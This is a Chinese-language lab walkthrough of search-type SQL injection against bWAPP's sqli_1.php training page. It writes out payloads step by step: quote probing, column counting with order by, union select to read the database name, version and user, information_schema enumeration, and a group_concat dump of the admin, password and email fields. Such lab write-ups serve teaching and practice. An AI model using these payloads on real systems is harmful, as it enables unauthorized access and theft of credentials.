標籤:bWAPP之sqli_1.php
1、測試有沒有注入點,如果有是什麼類型注入,首先在“title=1”後面加個單引號看結果,如:
報錯中含有"%"提示,所以可以確定是搜尋型SQL注入。
2、輸入“title=1%‘and‘%‘=‘”或“title=1%‘or‘%‘=‘”,都未報錯,且“title=1%‘or‘%‘=‘”顯示頁面如下:
接下來開始注入。
3、判斷欄位數:
輸入“title=1%‘order by 7 --+”,頁面返回正常;輸入“title=1%‘order by 8 --+”,頁面返回“Error: Unknown column ‘8‘ in ‘order clause‘”,說明欄位數為7,如:
這裡的注釋符要用“--”而不是“#”,至於原因我也不知道,如果有大牛看到,希望不吝賜教。
4、查詢資料庫名等資訊:
先看下顯示的位置,輸入:“title=1%‘union select 1,2,3,4,5,6,7 --+”,如:
接著輸入“title=1%‘union select 1,database(),version(),4,user(),6,7 --+”查看資料庫名,資料庫版本,當前資料庫使用者,如:
5、查詢表名:
輸入“title=1%‘union select 1,database(),version(),table_name,user(),6,7 from information_schema.tables where table_schema=‘bwapp‘ --+”,結果
很明顯我們要查看users表。
6、查詢欄位名:
輸入“title=1%‘union select 1,database(),version(),column_name,user(),6,7 from information_schema.columns where table_name=‘users‘ --+”,結果如:
users表中的欄位計較多,我們重點關注admin、password、email三個欄位。
7、查詢欄位內容:
輸入“title=1%‘union select 1,database(),version(),group_concat(admin,"||",password,"||",email),user(),6,7 from users --+”,結果如:
就以上這些步驟了,有興趣的可以自己嘗試其他表和其他欄位。
SQL注入之bWAPP之sqli_1.php